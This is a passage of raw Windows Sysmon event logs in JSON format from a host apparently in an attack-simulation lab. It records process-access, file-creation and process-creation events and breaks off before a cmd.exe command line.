C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5695,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5696,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5697,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5698,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5699,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5700,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5701,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-0010DD290900}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-0010DD290900}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5702,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:20.940\r\nProcessGuid: {41C8662E-20D8-5F25-0000-001067260900}\r\nProcessId: 5076\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\4l43qrpk.dll\r\nCreationUtcTime: 2020-08-01 07:59:20.862","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:20.940","ProcessGuid":"{41C8662E-20D8-5F25-0000-001067260900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\4l43qrpk.dll","CreationUtcTime":"2020-08-01 07:59:20.862","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5703,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.386\r\nProcessGuid: {41C8662E-20D9-5F25-0000-00109A2B0900}\r\nProcessId: 2964\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: 